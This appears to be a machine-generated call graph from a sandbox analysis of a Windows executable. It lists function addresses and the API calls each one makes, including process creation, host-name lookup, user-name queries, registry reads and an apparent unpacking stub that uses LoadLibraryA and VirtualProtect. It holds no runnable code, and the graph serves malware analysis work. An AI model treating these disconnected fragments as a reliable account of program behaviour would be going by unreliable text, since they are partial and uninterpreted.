109099 eac686 109095->109099 109096->109071 109098 f124f6 109097->109098 109100 ec010a 48 API calls 109098->109100 109102 eac68e _memmove 109099->109102 109103 ec010a 48 API calls 109099->109103 109101 f12518 109100->109101 109102->109071 109103->109102 109104->109065 109105->109065 109106->109072 109108 ea4d3d 109107->109108 109109 f145cf 109107->109109 109116 ea4d67 109108->109116 109111 eaa6f8 48 API calls 109109->109111 109112 f145da 109111->109112 109114 ec010a 48 API calls 109112->109114 109113 ea4d49 109113->109083 109115 f145ef _memmove 109114->109115 109117 ea4d7d 109116->109117 109120 ea4d78 _memmove 109116->109120 109118 ec010a 48 API calls 109117->109118 109119 f14703 109117->109119 109118->109120 109119->109119 109120->109113 109122 ead89e 50 API calls 109121->109122 109123 ea1a08 109122->109123 109124 ea1a12 109123->109124 109125 f1db7d 109123->109125 109127 ea84a6 81 API calls 109124->109127 109126 ea7e53 48 API calls 109125->109126 109128 f1db8d 109126->109128 109129 ea1a1f 109127->109129 109128->109128 109130 eac935 48 API calls 109129->109130 109131 ea1a2d 109130->109131 109132 ea1dce 109131->109132 109133 ea1de4 Mailbox 109132->109133 109134 f1db26 109133->109134 109137 ea1dfd 109133->109137 109135 f1db2b IsWindow 109134->109135 109136 f1db3f 109135->109136 109144 ea1e51 109135->109144 109200 ea200a 109136->109200 109139 ea84a6 81 API calls 109137->109139 109146 ea1e46 109137->109146 109142 ea1e17 109139->109142 109141 f1db65 IsWindow 109141->109136 109141->109144 109147 ea1f04 109142->109147 109144->107847 109146->109141 109146->109144 109148 ea1f1a Mailbox 109147->109148 109149 eac935 48 API calls 109148->109149 109150 ea1f3e 109149->109150 109151 eac935 48 API calls 109150->109151 109152 ea1f49 109151->109152 109153 ea7e53 48 API calls 109152->109153 109154 ea1f59 109153->109154 109155 ead3d2 48 API calls 109154->109155 109156 ea1f87 109155->109156 109157 ead3d2 48 API calls 109156->109157 109158 ea1f90 109157->109158 109159 ead3d2 48 API calls 109158->109159 109161 ea1f99 109159->109161 109160 f12569 109161->109160 109162 ea1fac 109161->109162 109201 ea2016 109200->109201 109202 ec010a 48 API calls 109201->109202 109203 ea2023 109202->109203 109204 ea197e 109203->109204 109205 ea1990 109204->109205 109209 ea19af _memmove 109204->109209 109208 ec010a 48 API calls 109205->109208 109206 ec010a 48 API calls 109207 ea19c6 109206->109207 109207->109144 109208->109209 109209->109206 109245->107886 109246->107906 109248 eac4cd 48 API calls 109247->109248 109249 ede2fe 109248->109249 109264 ea193b SendMessageTimeoutW 109249->109264 109251 ede305 109257 ede309 Mailbox 109251->109257 109265 ede390 109251->109265 109253 ede314 109254 ec010a 48 API calls 109253->109254 109255 ede338 SendMessageW 109254->109255 109256 ede34e _strlen 109255->109256 109255->109257 109258 ede378 109256->109258 109259 ede35a 109256->109259 109257->107919 109260 ea7e53 48 API calls 109258->109260 109270 ede0f5 48 API calls 2 library calls 109259->109270 109260->109257 109262 ede362 109263 eac610 50 API calls 109262->109263 109263->109257 109264->109251 109271 ea193b SendMessageTimeoutW 109265->109271 109267 ede39a 109268 ede39e 109267->109268 109269 ede3a2 SendMessageW 109267->109269 109268->109253 109269->109253 109270->109262 109271->109267 109272->107935 109273->107950 109274->107950 109275->107961 109276->107955 109277->107950 109278->107952 109280 f023eb _memset 109279->109280 109281 f02452 109280->109281 109282 f02428 109280->109282 109286 eacdb4 48 API calls 109281->109286 109287 f02476 109281->109287 109283 eacdb4 48 API calls 109282->109283 109284 f02433 109283->109284 109284->109287 109289 eacdb4 48 API calls 109284->109289 109285 f024b0 109291 ea84a6 81 API calls 109285->109291 109288 f02448 109286->109288 109287->109285 109290 eacdb4 48 API calls 109287->109290 109293 eacdb4 48 API calls 109288->109293 109289->109288 109290->109285 109292 f024d4 109291->109292 109294 ea3bcf 48 API calls 109292->109294 109293->109287 109295 f024de 109294->109295 109296 f025a1 109295->109296 109297 f024e8 109295->109297 109299 f025d3 GetCurrentDirectoryW 109296->109299 109302 ea84a6 81 API calls 109296->109302 109298 ea84a6 81 API calls 109297->109298 109300 f024f9 109298->109300 109301 ec010a 48 API calls 109299->109301 109303 ea3bcf 48 API calls 109300->109303 109304 f025f8 GetCurrentDirectoryW 109301->109304 109305 f025b8 109302->109305 109306 f02503 109303->109306 109310 f02605 109304->109310 109307 ea3bcf 48 API calls 109305->109307 109308 ea84a6 81 API calls 109306->109308 109312 f025c2 __NMSG_WRITE 109307->109312 109309 f02514 109308->109309 109313 ea3bcf 48 API calls 109309->109313 109311 f0263e 109310->109311 109314 eaca8e 48 API calls 109310->109314 109317 f0268a 109311->109317 109357 eea17a 8 API calls 109311->109357 109312->109299 109312->109311 109315 f0251e 109313->109315 109316 f0261e 109314->109316 109318 ea84a6 81 API calls 109315->109318 109319 eaca8e 48 API calls 109316->109319 109324 f026c1 109317->109324 109325 f0274c CreateProcessW 109317->109325 109321 f0252f 109318->109321 109322 f0262e 109319->109322 109326 ea3bcf 48 API calls 109321->109326 109327 eaca8e 48 API calls 109322->109327 109323 f02655 109358 eea073 8 API calls 109323->109358 109360 edbc90 69 API calls 109324->109360 109337 f0276b 109325->109337 109330 f02539 109326->109330 109327->109311 109331 f0256f GetSystemDirectoryW 109330->109331 109333 ea84a6 81 API calls 109330->109333 109335 ec010a 48 API calls 109331->109335 109332 f02670 109359 eea102 8 API calls 109332->109359 109336 f02550 109333->109336 109338 f02594 GetSystemDirectoryW 109335->109338 109339 ea3bcf 48 API calls 109336->109339 109341 f02780 109337->109341 109342 f027bd CloseHandle 109337->109342 109338->109310 109340 f0255a __NMSG_WRITE 109339->109340 109340->109310 109340->109331 109346 f02791 GetLastError 109341->109346 109343 f027cb 109342->109343 109350 f027f5 109342->109350 109361 ee9d09 CloseHandle Mailbox 109343->109361 109345 f027fb 109348 f027a5 109345->109348 109346->109348 109362 ee9b29 CloseHandle 109348->109362 109350->109345 109353 f02827 CloseHandle 109350->109353 109353->109348 109354 f01f2b 109354->107614 109356 f026df __NMSG_WRITE 109356->109337 109357->109323 109358->109332 109359->109317 109360->109356 109362->109354 109363->107979 109364->107981 109366 ef6b25 GetWindowRect 109365->109366 109367 ef6b42 109365->109367 109368 ef6b5c 109366->109368 109367->109368 109369 ef6b52 ClientToScreen 109367->109369 109368->107992 109368->107995 109369->109368 109370->107998 109371->108002 109372->108011 109373->108024 109374->108034 109375->108026 109384 efae3b 109376->109384 109379 efad05 Mailbox 109380 efad31 htons 109379->109380 109381 efad1b 109379->109381 109380->109381 109381->108047 109383 eed7f2 109382->109383 109383->108054 109385 eaa6d4 48 API calls 109384->109385 109386 efae49 109385->109386 109389 efae79 WideCharToMultiByte 109386->109389 109388 efacf3 inet_addr 109388->109379 109390 efae9d 109389->109390 109391 efaea7 109389->109391 109392 ebf324 48 API calls 109390->109392 109393 ec010a 48 API calls 109391->109393 109394 efaea5 109392->109394 109395 efaeae WideCharToMultiByte 109393->109395 109394->109388 109396 ebf2d0 48 API calls 109395->109396 109396->109394 109398 ea84a6 81 API calls 109397->109398 109399 eff7db 109398->109399 109403 eff81d Mailbox 109399->109403 109433 f00458 109399->109433 109401 effa7c 109402 effbeb 109401->109402 109408 effa86 109401->109408 109468 f00579 89 API calls Mailbox 109402->109468 109403->108057 109406 effbf8 109406->109408 109409 effc04 109406->109409 109407 eff875 Mailbox 109407->109401 109407->109403 109410 ea84a6 81 API calls 109407->109410 109464 f028d9 48 API calls _memmove 109407->109464 109465 effc96 60 API calls 2 library calls 109407->109465 109446 eff5fb 109408->109446 109409->109403 109410->109407 109415 effaba 109460 ebf92c 109415->109460 109418 effaee 109420 ea3320 48 API calls 109418->109420 109419 effad4 109466 eed520 86 API calls 4 library calls 109419->109466 109423 effb05 109420->109423 109422 effadf GetCurrentProcess TerminateProcess 109422->109418 109424 eb14a0 48 API calls 109423->109424 109432 effb2f 109423->109432 109426 effb1e 109424->109426 109425 effc56 109425->109403 109429 effc6f FreeLibrary 109425->109429 109467 f00300 105 API calls _free 109426->109467 109428 eb14a0 48 API calls 109428->109432 109429->109403 109431 ead89e 50 API calls 109431->109432 109432->109425 109432->109428 109432->109431 109469 f00300 105 API calls _free 109432->109469 109434 eab8a7 48 API calls 109433->109434 109435 f00473 CharLowerBuffW 109434->109435 109436 ef267a 60 API calls 109435->109436 109437 f00494 109436->109437 109439 ead3d2 48 API calls 109437->109439 109444 f004cf Mailbox 109437->109444 109440 f004ac 109439->109440 109441 ea7f40 48 API calls 109440->109441 109442 f004c3 109441->109442 109443 eaa2fb 48 API calls 109442->109443 109443->109444 109445 f0050b Mailbox 109444->109445 109470 effc96 60 API calls 2 library calls 109444->109470 109445->109407 109447 eff66b 109446->109447 109448 eff616 109446->109448 109452 f00719 109447->109452 109449 ec010a 48 API calls 109448->109449 109451 eff638 109449->109451 109450 ec010a 48 API calls 109450->109451 109451->109447 109451->109450 109453 f00944 Mailbox 109452->109453 109459 f0073c _strcat _wcscpy __NMSG_WRITE 109452->109459 109453->109415 109454 ead00b 58 API calls 109454->109459 109455 eacdb4 48 API calls 109455->109459 109456 ea84a6 81 API calls 109456->109459 109457 ec45ec 47 API calls _W_store_winword 109457->109459 109459->109453 109459->109454 109459->109455 109459->109456 109459->109457 109471 ee8932 50 API calls __NMSG_WRITE 109459->109471 109461 ebf941 109460->109461 109462 ebf9d9 select 109461->109462 109463 ebf9a7 109461->109463 109462->109463 109463->109418 109463->109419 109464->109407 109465->109407 109466->109422 109467->109432 109468->109406 109469->109432 109470->109445 109471->109459 109473 ebdd89 109472->109473 109474 f14a7d FindFirstFileW 109472->109474 109473->107614 109475 f14a95 FindClose 109474->109475 109476 f14a8e 109474->109476 109476->109475 109478 ee7700 109477->109478 109489 ee76f9 _wcsncpy 109477->109489 109479 ec010a 48 API calls 109478->109479 109480 ee7706 GetFileVersionInfoW 109479->109480 109481 ee7722 __NMSG_WRITE 109480->109481 109482 ec010a 48 API calls 109481->109482 109484 ee7739 _wcscat _wcscmp _wcscpy _wcsstr 109482->109484 109483 ec1bc7 _W_store_winword 59 API calls 109485 ee77f7 109483->109485 109488 ee7779 74D41560 109484->109488 109491 ee7793 _wcscat 109484->109491 109486 ee7827 74D41560 109485->109486 109485->109489 109487 ee783d _wcscmp 109486->109487 109486->109489 109487->109489 109492 ec234b 80 API calls 3 library calls 109487->109492 109488->109491 109489->108071 109491->109483 109492->109489 109493->107637 109494->107641 109495->107660 109496->107656 109497->107677 109498->107677 109499 ea29c2 109500 ea29cb 109499->109500 109501 ea2a48 109500->109501 109502 ea29e9 109500->109502 109540 ea2a46 109500->109540 109506 ea2a4e 109501->109506 109507 f12307 109501->109507 109503 ea2aac PostQuitMessage 109502->109503 109504 ea29f6 109502->109504 109513 ea2a39 109503->109513 109511 ea2a01 109504->109511 109512 f1238f 109504->109512 109505 ea2a2b NtdllDefWindowProc_W 109505->109513 109508 ea2a53 109506->109508 109509 ea2a76 SetTimer RegisterClipboardFormatW 109506->109509 109554 ea322e 16 API calls 109507->109554 109514 ea2a5a KillTimer 109508->109514 109515 f122aa 109508->109515 109509->109513 109517 ea2a9f CreatePopupMenu 109509->109517 109518 ea2a09 109511->109518 109519 ea2ab6 109511->109519 109560 ee57fb 60 API calls _memset 109512->109560 109551 ea2b94 Shell_NotifyIconW _memset 109514->109551 109527 f122e3 MoveWindow 109515->109527 109528 f122af 109515->109528 109516 f1232e 109555 ebec33 417 API calls Mailbox 109516->109555 109517->109513 109523 f12374 109518->109523 109524 ea2a14 109518->109524 109544 ea1e58 109519->109544 109523->109505 109559 edb31f 48 API calls 109523->109559 109530 ea2a1f 109524->109530 109531 f1235f 109524->109531 109525 f123a1 109525->109505 109525->109513 109527->109513 109532 f122b3 109528->109532 109533 f122d2 SetFocus 109528->109533 109529 ea2a6d 109552 ea2ac7 DeleteObject DestroyWindow Mailbox 109529->109552 109530->109505 109556 ea2b94 Shell_NotifyIconW _memset 109530->109556 109558 ee5fdb 70 API calls _memset 109531->109558 109532->109530 109537 f122bc 109532->109537 109533->109513 109553 ea322e 16 API calls 109537->109553 109539 f1236f 109539->109513 109540->109505 109542 f12353 109557 ea3598 67 API calls _memset 109542->109557 109545 ea1e6f _memset 109544->109545 109546 ea1ef1 109544->109546 109561 ea38e4 109545->109561 109546->109513 109548 ea1eda KillTimer SetTimer 109548->109546 109549 ea1e96 109549->109548 109550 f14518 Shell_NotifyIconW 109549->109550 109550->109548 109551->109529 109552->109513 109553->109513 109554->109516 109555->109530 109556->109542 109557->109540 109558->109539 109559->109540 109560->109525 109562 ea3900 109561->109562 109582 ea39d5 Mailbox 109561->109582 109583 ea7b6e 48 API calls 109562->109583 109564 ea390e 109565 ea391b 109564->109565 109566 f1453f LoadStringW 109564->109566 109567 ea7e53 48 API calls 109565->109567 109569 f14559 109566->109569 109568 ea3930 109567->109568 109568->109569 109570 ea3941 109568->109570 109585 ea39e8 48 API calls 2 library calls 109569->109585 109572 ea39da 109570->109572 109573 ea394b 109570->109573 109574 eac935 48 API calls 109572->109574 109584 ea39e8 48 API calls 2 library calls 109573->109584 109580 ea3956 _memset _wcscpy 109574->109580 109576 f14564 109577 f14578 109576->109577 109576->109580 109586 ea39e8 48 API calls 2 library calls 109577->109586 109579 f14586 109581 ea39ba Shell_NotifyIconW 109580->109581 109581->109582 109582->109549 109583->109564 109584->109580 109585->109576 109586->109579 109587 f11edb 109592 ea131c 109587->109592 109593 ea133e 109592->109593 109626 ea1624 109593->109626 109598 ead3d2 48 API calls 109599 ea137e 109598->109599 109600 ead3d2 48 API calls 109599->109600 109601 ea1388 109600->109601 109602 ead3d2 48 API calls 109601->109602 109603 ea1392 109602->109603 109604 ead3d2 48 API calls 109603->109604 109605 ea13d8 109604->109605 109606 ead3d2 48 API calls 109605->109606 109607 ea14bb 109606->109607 109634 ea1673 109607->109634 109672 ea17e0 109626->109672 109629 ea7e53 48 API calls 109630 ea1344 109629->109630 109631 ea16db 109630->109631 109686 ea1867 6 API calls 109631->109686 109633 ea1374 109633->109598 109635 ead3d2 48 API calls 109634->109635 109636 ea1683 109635->109636 109637 ead3d2 48 API calls 109636->109637 109638 ea168b 109637->109638 109687 ea7d70 109638->109687 109679 ea17fc 109672->109679 109675 ea17fc 48 API calls 109676 ea17f0 109675->109676 109677 ead3d2 48 API calls 109676->109677 109678 ea165b 109677->109678 109678->109629 109680 ead3d2 48 API calls 109679->109680 109681 ea1807 109680->109681 109682 ead3d2 48 API calls 109681->109682 109683 ea180f 109682->109683 109684 ead3d2 48 API calls 109683->109684 109685 ea17e8 109684->109685 109685->109675 109686->109633 109688 ead3d2 48 API calls 109687->109688 109689 ea7d79 109688->109689 109690 ead3d2 48 API calls 109689->109690 109694 f1c05b 109695 f1c05d 109694->109695 109698 ee78ee WSAStartup 109695->109698 109697 f1c066 109699 ee7917 gethostname gethostbyname 109698->109699 109700 ee79b1 _wcscpy 109698->109700 109699->109700 109701 ee793a _memmove 109699->109701 109700->109697 109702 ee7970 inet_ntoa 109701->109702 109706 ee7952 _wcscpy 109701->109706 109704 ee7989 _strcat 109702->109704 109703 ee79a9 WSACleanup 109703->109700 109707 ee8553 109704->109707 109706->109703 109708 ee8565 _strlen 109707->109708 109709 ee8561 109707->109709 109710 ee8574 MultiByteToWideChar 109708->109710 109709->109706 109710->109709 109711 ee858a 109710->109711 109712 ec010a 48 API calls 109711->109712 109713 ee85a6 MultiByteToWideChar 109712->109713 109713->109709 109714 ec6a80 109715 ec6a8c _fseek 109714->109715 109751 ec8b7b GetStartupInfoW 109715->109751 109718 ec6a91 109753 eca937 GetProcessHeap 109718->109753 109719 ec6ae9 109720 ec6af4 109719->109720 109838 ec6bd0 47 API calls 3 library calls 109719->109838 109754 ec87d7 109720->109754 109723 ec6afa 109724 ec6b05 __RTC_Initialize 109723->109724 109839 ec6bd0 47 API calls 3 library calls 109723->109839 109775 ecba66 109724->109775 109727 ec6b14 109728 ec6b20 GetCommandLineW 109727->109728 109840 ec6bd0 47 API calls 3 library calls 109727->109840 109794 ed3c2d GetEnvironmentStringsW 109728->109794 109731 ec6b1f 109731->109728 109735 ec6b45 109807 ed3a64 109735->109807 109738 ec6b4b 109741 ec6b56 109738->109741 109842 ec1d7b 47 API calls 3 library calls 109738->109842 109821 ec1db5 109741->109821 109752 ec8b91 109751->109752 109752->109718 109753->109719 109846 ec1e5a 30 API calls 2 library calls 109754->109846 109756 ec87dc 109847 ec8ab3 InitializeCriticalSectionAndSpinCount 109756->109847 109758 ec87e1 109759 ec87e5 109758->109759 109849 ec8afd TlsAlloc 109758->109849 109848 ec884d 50 API calls 2 library calls 109759->109848 109762 ec87ea 109762->109723 109763 ec87f7 109763->109759 109764 ec8802 109763->109764 109850 ec7616 109764->109850 109767 ec8844 109858 ec884d 50 API calls 2 library calls 109767->109858 109770 ec8849 109770->109723 109771 ec8823 109771->109767 109772 ec8829 109771->109772 109857 ec8724 47 API calls 4 library calls 109772->109857 109774 ec8831 GetCurrentThreadId 109774->109723 109776 ecba72 _fseek 109775->109776 109867 ec8984 109776->109867 109778 ecba79 109779 ec7616 __calloc_crt 47 API calls 109778->109779 109780 ecba8a 109779->109780 109781 ecbaf5 GetStartupInfoW 109780->109781 109782 ecba95 _fseek @_EH4_CallFilterFunc@8 109780->109782 109789 ecbc33 109781->109789 109791 ecbb0a 109781->109791 109782->109727 109783 ecbcf7 109874 ecbd0b RtlLeaveCriticalSection _doexit 109783->109874 109785 ecbc7c GetStdHandle 109785->109789 109786 ec7616 __calloc_crt 47 API calls 109786->109791 109787 ecbc8e GetFileType 109787->109789 109788 ecbb58 109788->109789 109792 ecbb98 InitializeCriticalSectionAndSpinCount 109788->109792 109793 ecbb8a GetFileType 109788->109793 109789->109783 109789->109785 109789->109787 109790 ecbcbb InitializeCriticalSectionAndSpinCount 109789->109790 109790->109789 109791->109786 109791->109788 109791->109789 109792->109788 109793->109788 109793->109792 109795 ed3c3e 109794->109795 109796 ec6b30 109794->109796 109913 ec7660 47 API calls _W_store_winword 109795->109913 109801 ed382b GetModuleFileNameW 109796->109801 109799 ed3c64 _memmove 109800 ed3c7a FreeEnvironmentStringsW 109799->109800 109800->109796 109802 ed385f _wparse_cmdline 109801->109802 109803 ec6b3a 109802->109803 109804 ed3899 109802->109804 109803->109735 109841 ec1d7b 47 API calls 3 library calls 109803->109841 109914 ec7660 47 API calls _W_store_winword 109804->109914 109806 ed389f _wparse_cmdline 109806->109803 109808 ed3a7d __NMSG_WRITE 109807->109808 109812 ed3a75 109807->109812 109809 ec7616 __calloc_crt 47 API calls 109808->109809 109818 ed3aa6 __NMSG_WRITE 109809->109818 109810 ed3afd 109811 ec28ca _free 47 API calls 109810->109811 109811->109812 109812->109738 109813 ec7616 __calloc_crt 47 API calls 109813->109818 109814 ed3b22 109815 ec28ca _free 47 API calls 109814->109815 109815->109812 109817 ed3b39 109916 ec7ab0 IsProcessorFeaturePresent 109817->109916 109818->109810 109818->109812 109818->109813 109818->109814 109818->109817 109915 ed3317 47 API calls _fseek 109818->109915 109822 ec1dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 109821->109822 109838->109720 109839->109724 109840->109731 109846->109756 109847->109758 109848->109762 109849->109763 109852 ec761d 109850->109852 109853 ec765a 109852->109853 109854 ec763b Sleep 109852->109854 109859 ed3e5a 109852->109859 109853->109767 109856 ec8b59 TlsSetValue 109853->109856 109855 ec7652 109854->109855 109855->109852 109855->109853 109856->109771 109857->109774 109858->109770 109860 ed3e65 109859->109860 109865 ed3e80 __calloc_impl 109859->109865 109861 ed3e71 109860->109861 109860->109865 109866 ec889e 47 API calls __getptd_noexit 109861->109866 109862 ed3e90 RtlAllocateHeap 109864 ed3e76 109862->109864 109862->109865 109864->109852 109865->109862 109865->109864 109866->109864 109868 ec89a8 RtlEnterCriticalSection 109867->109868 109869 ec8995 109867->109869 109868->109778 109875 ec8a0c 109869->109875 109871 ec899b 109871->109868 109899 ec1d7b 47 API calls 3 library calls 109871->109899 109874->109782 109876 ec8a18 _fseek 109875->109876 109877 ec8a39 109876->109877 109878 ec8a21 109876->109878 109879 ec8a37 109877->109879 109885 ec8aa1 _fseek 109877->109885 109900 ec8e52 47 API calls __NMSG_WRITE 109878->109900 109879->109877 109903 ec7660 47 API calls _W_store_winword 109879->109903 109882 ec8a26 109901 ec8eb2 47 API calls 5 library calls 109882->109901 109883 ec8a4d 109886 ec8a54 109883->109886 109887 ec8a63 109883->109887 109885->109871 109904 ec889e 47 API calls __getptd_noexit 109886->109904 109890 ec8984 __lock 46 API calls 109887->109890 109888 ec8a2d 109902 ec1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109888->109902 109893 ec8a6a 109890->109893 109892 ec8a59 109892->109885 109894 ec8a8e 109893->109894 109895 ec8a79 InitializeCriticalSectionAndSpinCount 109893->109895 109905 ec28ca 109894->109905 109896 ec8a94 109895->109896 109911 ec8aaa RtlLeaveCriticalSection _doexit 109896->109911 109900->109882 109901->109888 109903->109883 109904->109892 109906 ec28fc __dosmaperr 109905->109906 109907 ec28d3 RtlFreeHeap 109905->109907 109906->109896 109907->109906 109908 ec28e8 109907->109908 109912 ec889e 47 API calls __getptd_noexit 109908->109912 109910 ec28ee GetLastError 109910->109906 109911->109885 109912->109910 109913->109799 109914->109806 109915->109818 110705 f14ddc 110706 f14de6 VariantClear 110705->110706 110707 eb4472 110705->110707 110706->110707 110708 10020b0 110709 10020c0 110708->110709 110710 10021da LoadLibraryA 110709->110710 110713 100221f VirtualProtect VirtualProtect 110709->110713 110711 10021f1 110710->110711 110711->110709 110715 1002203 GetProcAddress 110711->110715 110714 1002284 110713->110714 110714->110714 110715->110711 110716 1002219 ExitProcess 110715->110716 110717 eb1118 110782 ebe016 110717->110782 110719 eb112e 110720 eb1148 110719->110720 110721 f1abeb 110719->110721 110723 eb3680 417 API calls 110720->110723 110796 ebcf79 49 API calls 110721->110796 110763 eafad8 Mailbox _memmove 110723->110763 110725 f1b628 Mailbox 110726 f1ac2a 110728 f1ac4a Mailbox 110726->110728 110797 eeba5d 48 API calls 110726->110797 110800 eed520 86 API calls 4 library calls 110728->110800 110729 ec010a 48 API calls 110729->110763 110731 eb105e 110741 eac935 48 API calls 110731->110741 110732 eb0119 110803 eed520 86 API calls 4 library calls 110732->110803 110734 eb1063 110802 eed520 86 API calls 4 library calls 110734->110802 110735 eac935 48 API calls 110735->110763 110736 eb0dee 110738 ead89e 50 API calls 110736->110738 110739 eb0dfa 110738->110739 110743 ead89e 50 API calls 110739->110743 110740 f1b772 110804 eed520 86 API calls 4 library calls 110740->110804 110756 eafbf1 Mailbox 110741->110756 110742 eaf6d0 417 API calls 110742->110763 110745 eb0e83 110743->110745 110750 eacaee 48 API calls 110745->110750 110746 eda599 InterlockedDecrement 110746->110763 110747 ead3d2 48 API calls 110747->110763 110749 f1b7d2 110759 eb10f1 Mailbox 110750->110759 110752 ec1b2a 52 API calls __cinit 110752->110763 110754 eb1230 110754->110756 110801 eed520 86 API calls 4 library calls 110754->110801 110757 eafa40 417 API calls 110757->110763 110799 eed520 86 API calls 4 library calls 110759->110799 110761 f1b583 110798 eed520 86 API calls 4 library calls 110761->110798 110763->110729 110763->110731 110763->110732 110763->110734 110763->110735 110763->110736 110763->110739 110763->110740 110763->110742 110763->110745 110763->110746 110763->110747 110763->110752 110763->110754 110763->110756 110763->110757 110763->110759 110763->110761 110764 ef936f 55 API calls 110763->110764 110765 efb74b 417 API calls 110763->110765 110766 ebef0d 94 API calls 110763->110766 110767 ea50a3 49 API calls 110763->110767 110768 f01f19 132 API calls 110763->110768 110769 ebf461 98 API calls 110763->110769 110770 ef8065 55 API calls 110763->110770 110771 f00bfa 129 API calls 110763->110771 110772 ef9122 91 API calls 110763->110772 110773 ef92c0 88 API calls 110763->110773 110774 ebdd84 3 API calls 110763->110774 110775 ef013f 87 API calls 110763->110775 110776 ebf03e 2 API calls 110763->110776 110777 f010e5 82 API calls 110763->110777 110778 f017aa 87 API calls 110763->110778 110779 f030ad 93 API calls 110763->110779 110780 f0798d 109 API calls 110763->110780 110781 f0804e 113 API calls 110763->110781 110791 eb1620 59 API calls Mailbox 110763->110791 110792 efee52 82 API calls 2 library calls 110763->110792 110793 efef9d 90 API calls Mailbox 110763->110793 110794 eeb020 48 API calls 110763->110794 110795 efe713 417 API calls Mailbox 110763->110795 110764->110763 110765->110763 110766->110763 110767->110763 110768->110763 110769->110763 110770->110763 110771->110763 110772->110763 110773->110763 110774->110763 110775->110763 110776->110763 110777->110763 110778->110763 110779->110763 110780->110763 110781->110763 110783 ebe022 110782->110783 110784 ebe034 110782->110784 110785 ead89e 50 API calls 110783->110785 110786 ebe03a 110784->110786 110787 ebe063 110784->110787 110790 ebe02c 110785->110790 110789 ec010a 48 API calls 110786->110789 110788 ead89e 50 API calls 110787->110788 110788->110790 110789->110790 110790->110719 110791->110763 110792->110763 110793->110763 110794->110763 110795->110763 110796->110726 110797->110728 110798->110759 110799->110756 110800->110725 110801->110734 110802->110732 110803->110740 110804->110749 110805 f1bc25 110806 f1bc27 110805->110806 110809 ee79f8 SHGetFolderPathW 110806->110809 110808 f1bc30 110808->110808 110810 ea7e53 48 API calls 110809->110810 110811 ee7a25 110810->110811 110811->110808 110812 f1c146 GetUserNameW 110813 f11e8b 110818 ebe44f 110813->110818 110817 f11e9a 110819 ec010a 48 API calls 110818->110819 110820 ebe457 110819->110820 110821 ebe46b 110820->110821 110826 ebe74b 110820->110826 110825 ec1b2a 52 API calls __cinit 110821->110825 110825->110817 110827 ebe463 110826->110827 110828 ebe754 110826->110828 110830 ebe47b 110827->110830 110858 ec1b2a 52 API calls __cinit 110828->110858 110831 ead3d2 48 API calls 110830->110831 110832 ebe492 GetVersionExW 110831->110832 110833 ea7e53 48 API calls 110832->110833 110834 ebe4d5 110833->110834 110859 ebe5f8 110834->110859 110837 ebe617 48 API calls 110838 ebe4e9 110837->110838 110841 f129f9 110838->110841 110863 ebe6d1 110838->110863 110842 ebe55f GetCurrentProcess 110872 ebe70e LoadLibraryA GetProcAddress 110842->110872 110843 ebe576 110845 ebe59e 110843->110845 110846 ebe5ec GetSystemInfo 110843->110846 110866 ebe694 110845->110866 110847 ebe5c9 110846->110847 110849 ebe5dc 110847->110849 110850 ebe5d7 FreeLibrary 110847->110850 110849->110821 110850->110849 110852 ebe5e4 GetSystemInfo 110854 ebe5be 110852->110854 110853 ebe5b4 110869 ebe437 110853->110869 110854->110847 110856 ebe5c4 FreeLibrary 110854->110856 110856->110847 110858->110827 110860 ebe601 110859->110860 110861 eaa2fb 48 API calls 110860->110861 110862 ebe4dd 110861->110862 110862->110837 110873 ebe6e3 110863->110873 110877 ebe6a6 110866->110877 110870 ebe694 2 API calls 110869->110870 110871 ebe43f GetNativeSystemInfo 110870->110871 110871->110854 110872->110843 110874 ebe55b 110873->110874 110875 ebe6ec LoadLibraryA 110873->110875 110874->110842 110874->110843 110875->110874 110876 ebe6fd GetProcAddress 110875->110876 110876->110874 110878 ebe5ac 110877->110878 110879 ebe6af LoadLibraryA 110877->110879 110878->110852 110878->110853 110879->110878 110880 ebe6c0 GetProcAddress 110879->110880 110880->110878 110881 f11eca 110886 ebbe17 110881->110886 110885 f11ed9 110887 ead3d2 48 API calls 110886->110887 110888 ebbe85 110887->110888 110895 ebc929 110888->110895 110890 f1db92 110892 ebbf22 110892->110890 110893 ebbf3e 110892->110893 110898 ebc8b7 48 API calls _memmove 110892->110898 110894 ec1b2a 52 API calls __cinit 110893->110894 110894->110885 110899 ebc955 110895->110899 110898->110892 110900 ebc948 110899->110900 110901 ebc962 110899->110901 110900->110892 110901->110900 110902 ebc969 RegOpenKeyExW 110901->110902 110902->110900 110903 ebc983 RegQueryValueExW 110902->110903 110904 ebc9b9 RegCloseKey 110903->110904 110905 ebc9a4 110903->110905 110904->110900 110905->110904 110906 f11eed 110911 ebe975 110906->110911 110908 f11f01 110927 ec1b2a 52 API calls __cinit 110908->110927 110910 f11f0b 110912 ec010a 48 API calls 110911->110912 110913 ebea27 GetModuleFileNameW 110912->110913 110914 ec297d __wsplitpath 47 API calls 110913->110914 110915 ebea5b _wcsncat 110914->110915 110928 ec2bff 110915->110928 110918 ec010a 48 API calls 110919 ebea94 _wcscpy 110918->110919 110920 ead3d2 48 API calls 110919->110920 110921 ebeacf 110920->110921 110931 ebeb05 110921->110931 110923 ebeae0 Mailbox 110923->110908 110924 eaa4f6 48 API calls 110926 ebeada _wcscat __NMSG_WRITE _wcsncpy 110924->110926 110925 ec010a 48 API calls 110925->110926 110926->110923 110926->110924 110926->110925 110927->110910 110945 ecaab9 110928->110945 110932 eac4cd 48 API calls 110931->110932 110933 ebeb14 RegOpenKeyExW 110932->110933 110934 f14b17 RegQueryValueExW 110933->110934 110935 ebeb35 110933->110935 110936 f14b91 RegCloseKey 110934->110936 110937 f14b30 110934->110937 110935->110926 110938 ec010a 48 API calls 110937->110938 110939 f14b49 110938->110939 110940 ea4bce 48 API calls 110939->110940 110941 f14b53 RegQueryValueExW 110940->110941 110942 f14b86 110941->110942 110943 f14b6f 110941->110943 110942->110936 110944 ea7e53 48 API calls 110943->110944 110944->110942 110946 ecaaca 110945->110946 110947 ecabc6 110945->110947 110946->110947 110953 ecaad5 110946->110953 110955 ec889e 47 API calls __getptd_noexit 110947->110955 110949 ecabbb 110956 ec7aa0 8 API calls _fseek 110949->110956 110952 ebea8a 110952->110918 110953->110952 110954 ec889e 47 API calls __getptd_noexit 110953->110954 110954->110949 110955->110949 110956->110952 110957 eb0ff7 110958 ebe016 50 API calls 110957->110958 110959 eb100d 110958->110959 111014 ebe08f 110959->111014 110961 eb103d 110978 eafbf1 Mailbox 110961->110978 111033 eed520 86 API calls 4 library calls 110961->111033 110965 eb105e 110973 eac935 48 API calls 110965->110973 